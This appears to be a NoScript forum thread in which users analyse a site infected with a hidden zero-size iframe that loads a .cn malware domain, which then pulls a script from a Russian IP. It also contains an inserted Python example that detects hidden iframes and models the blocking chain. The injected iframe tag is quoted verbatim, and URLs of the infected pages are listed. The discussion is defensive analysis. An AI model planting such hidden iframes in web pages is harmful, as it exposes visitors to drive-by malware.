Why does .CN show as Allowable?

therube
Ambassador
Posts: 7969
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Why does .CN show as Allowable?

Post by therube »

NOTE: SITES CONTAIN MALWARE


URL: view-source:http://www.8bitfm.com/

At the very bottom of the page is found:

Code:

<iframe src="http://reycross.cn/qaqa/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Why is NoScript blocking (which is a good thing) the site? And in the same manner, why is the NoScript context menu offering to Allow reycross.cn?

As in like, where is the <script>?
So is NoScript treating a foreign domain found in an iframe as if it were <script>?


Or is it being treated as an <object> & being blocked by the Forbid other plugins restriction?


Note that on a site like this, http://www.stargateteam.de/include.php?path=misc/suggest.php (which contains the same exploit) which is slow loading for me, the Blocked Objects context menu is slow to appear. So if you happen to look once - as the page is loading, it may not yet be there, but if you look again, later, it will be.

PS: Google flags this second site, http://www.google.com/interstitial?url=http://www.stargateteam.de/include.php%3Fpath%3Dmisc/suggest.php%26suggest_path%3Dpath%253Dcontent%252Fnews.php%2526contentid%253D12%26PHPKITSID%3D2ea533cd867c1eac097cf84d0086ab92
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1pre) Gecko/20090705 SeaMonkey/2.0b1pre
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Why does .CN show as Allowable?

Post by Tom T. »

A lot of sites support e-mail. I think you meant "malware" in your warning. ;)

What's even more interesting is that if you allow the iFrame (tagged, "hidden"), but *not* the script, a new script appears in the Allow menu: 91.212.198.16

IP address: 91.212.198.16
No host name is associated with this IP address or no reverse lookup is configured.
Error:Host not found
91.212.198.16 is from Russian Federation(RU) in region Eastern Europe

The long-feared Sino-Russian Alliance? (known during the Cold War as the Sino-Soviet Alliance).
Last edited by Tom T. on Tue Jul 14, 2009 5:25 am, edited 1 time in total.
Reason: add new script found
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard

Re: Why does .CN show as Allowable?

Post by therube »

(Fixed 'mailware'.)

Since you brought it up ... http://www.dslreports.com/speak/print/default;22703885 & the full thread, http://www.dslreports.com/forum/r22702532-8bitfm.

How did you "Allow" this IFRAME?

Re: Why does .CN show as Allowable?

Post by Tom T. »

Does anyone alert these sites that they've been infected? (did you?) Do the AV people?
Aren't you glad you use NS, esp. since you don't use AV? (some in that thread were getting AV alerts, since they did not have the blocking power of NS).
Interesting. Someone needs to tell every site where it's found, and Interpol or someone needs to crack down on the people behind this kind of stuff.
therube wrote: How did you "Allow" this IFRAME?
NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Done in a sandboxed browser. Didn't allow the Russian script, of course, but if there were anything malicious in the iframe itself, it would have been isolated from the rest of the machine (rest of HD is read-only to a sandboxed browser) and flushed when the browser was closed. I don't see how malsites can be investigated safely otherwise.

Re: Why does .CN show as Allowable?

Post by therube »

> NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Now why didn't I think of that?

8bit has been notified.
But exploits like this (or the ones luntrus posts) are so pervasive. Just Google some of the strings used in the exploits.
It's more the website hosts & then the webmasters that need to get on the ball to try to stay ahead of the game.

Re: Why does .CN show as Allowable?

Post by therube »

So this morning, I get to thinking, now why does reycross.cn "turn" into 91.212.198.16?

And then it was like, duh!

Because I had <IFRAME> blocked, reycross.cn never "ran".
Since reycross.cn never ran, in turn 91.212.198.16 was never loaded.

But once I allowed <IFRAME>, then reycross.cn "ran".
Which subsequently attempted to "run" 91.212.198.16, which relies upon <script>, which NoScript then happily blocked.

So two avenues of protection.
First <IFRAME> was blocked. By doing so, that thwarted the start of the malware process.
Secondly, once <IFRAME> was allowed, NoScript then blocked the <script> that was subsequently attempting to run.

Good job.


view-source:http://reycross.cn/qaqa/
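The two-layer behaviour worked out in the post above (blocked <IFRAME> means the framed page is never fetched, so the script it would pull in is never even requested; with frames allowed, that script still needs its own permission), together with the hidden zero-size iframe quoted in the opening post, modelled as a small Python program. This is an added example, not code from the thread or from NoScript. The page markup is constructed for the example; the hostnames reycross.cn and 91.212.198.16 are from the thread, but the content of the framed document is assumed (only its URL appears in the posts), and the policy dictionary is a stand-in for NoScript's own settings, not its API.

```python
"""Added example: static hidden-iframe check plus a load-chain model.

Not from the original thread and not NoScript code. DOCUMENTS is a
constructed fixture standing in for what the browser would fetch.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DOCUMENTS = {
    # Constructed stand-in for the infected page; the iframe tag is the one
    # quoted in the thread, the rest of the markup is made up.
    "http://www.8bitfm.com/": (
        "<html><body><h1>8bit FM</h1>"
        '<script src="/js/player.js"></script>'
        '<iframe src="http://reycross.cn/qaqa/" width=0 height=0 style="hidden"'
        " frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>"
        "</body></html>"
    ),
    # ASSUMED content of the framed page: the thread only says that allowing
    # the frame caused a script from 91.212.198.16 to be requested.
    "http://reycross.cn/qaqa/": (
        '<html><body><script src="http://91.212.198.16/x.js"></script></body></html>'
    ),
}


class RefParser(HTMLParser):
    """Collect (tag, absolute_url, attrs) for every <iframe src> / <script src>."""

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)  # unquoted values such as width=0 arrive as strings
        if a.get("src"):
            self.refs.append((tag, urljoin(self.base, a["src"]), a))


def host(url):
    return urlsplit(url).hostname


def is_hidden_iframe(attrs):
    """Zero-size or hidden frames: the injection pattern shown in the thread."""
    zero = attrs.get("width") == "0" or attrs.get("height") == "0"
    hidden = "hidden" in attrs or "hidden" in (attrs.get("style") or "")
    return zero or hidden


def hidden_cross_site_frames(url, fetch=DOCUMENTS.get):
    """Static check of one page: hidden iframes whose src is off-site."""
    p = RefParser(url)
    p.feed(fetch(url) or "")
    return [ref for kind, ref, a in p.refs
            if kind == "iframe" and host(ref) != host(url) and is_hidden_iframe(a)]


def load(url, policy, fetch=DOCUMENTS.get, _seen=None):
    """Simulate a page load under a policy and return what was fetched/blocked.

    policy = {"forbid_iframe": bool, "allow_script": set of hostnames}
    A blocked frame is not recursed into, so nothing it would have loaded
    shows up in either list: that is the first layer from the post above.
    Scripts are fetched only when their host is on the allow list: the
    second layer.
    """
    seen = _seen if _seen is not None else set()
    result = {"fetched": [url], "blocked": []}
    doc = fetch(url)
    if doc is None or url in seen:
        return result
    seen.add(url)
    p = RefParser(url)
    p.feed(doc)
    for kind, ref, _attrs in p.refs:
        if kind == "iframe":
            if policy["forbid_iframe"] and host(ref) != host(url):
                result["blocked"].append(("iframe", ref, "forbid_iframe"))
                continue
            sub = load(ref, policy, fetch, seen)
            result["fetched"] += sub["fetched"]
            result["blocked"] += sub["blocked"]
        elif host(ref) in policy["allow_script"]:
            result["fetched"].append(ref)
        else:
            result["blocked"].append(("script", ref, "script_not_allowed"))
    return result


if __name__ == "__main__":
    page = "http://www.8bitfm.com/"
    print("hidden off-site frames:", hidden_cross_site_frames(page))
    for forbid in (True, False):
        r = load(page, {"forbid_iframe": forbid, "allow_script": {"www.8bitfm.com"}})
        print(f"forbid_iframe={forbid}: fetched={r['fetched']} blocked={r['blocked']}")
```

With frames forbidden the 91.212.198.16 script appears in neither list, which is exactly why it only showed up in the Allow menu after the iframe was permitted; with frames allowed it appears as blocked, waiting for a decision.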

Re: Why does .CN show as Allowable?

Post by Tom T. »

therube wrote:> NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Now why didn't I think of that?
I was wondering that myself. But we all have our share of brain flatulence -- I know I do. :D
therube wrote: 8bit has been notified.
But exploits like this (or the ones luntrus posts) are so pervasive. Just Google some of the strings used in the exploits.
It's more the website hosts & then the webmasters that need to get on the ball to try to stay ahead of the game.
For that matter, couldn't ISPs add such strings to their filter lists? There are a lot fewer ISPs than web sites; it would be a real service, both to the sites they host for and for their end-user customers, and they'd save a bundle in bandwidth. What say?

Re: Why does .CN show as Allowable?

Post by Tom T. »

therube wrote:So this morning, I get to thinking, now why does reycross.cn "turn" into 91.212.198.16?

And then it was like, duh!

Because I had <IFRAME> blocked, reycross.cn never "ran".
Since reycross.cn never ran, in turn 91.212.198.16 was never loaded.

But once I allowed <IFRAME>, then reycross.cn "ran".
Which subsequently attempted to "run" 91.212.198.16, which relies upon <script>, which NoScript then happily blocked.

So two avenues of protection.
First <IFRAME> was blocked. By doing so, that thwarted the start of the malware process.
Secondly, once <IFRAME> was allowed, NoScript then blocked the <script> that was subsequently attempting to run.

Good job.
Not sure if the last comment was intended for NS or for myself, but either way... :)
Yep, NS was double-protection if you run 100%-lockdown as I do (all "plugin" options checked); and the first layer had to be deliberately allowed even to see the second.

Which brings us to the suggestion in another thread, mostly retracted, that "TA all this page" should also TA all subsequent layers of script loading. Here is a perfect example of why that is not a good idea. Under the current setup, even if you TA'd the page with reycross, it seems no harm would come. You'd see the 91 script, it would be a heads-up, and you'd be alerted to investigate before allowing -- or just don't allow it.

Re: Why does .CN show as Allowable?

Post by therube »

Tom T. wrote: Not sure if the last comment was intended for NS or for myself, but either way... :)
Yes.
Tom T. wrote: Which brings us to the suggestion in another thread ... that "TA all this page" should also TA all subsequent layers of script loading. Here is a perfect example of why that is not a good idea. Under the current setup, even if you TA'd the page with reycross, it seems no harm would come. You'd see the 91 script, it would be a heads-up, and you'd be alerted to investigate before allowing -- or just don't allow it.
Correct.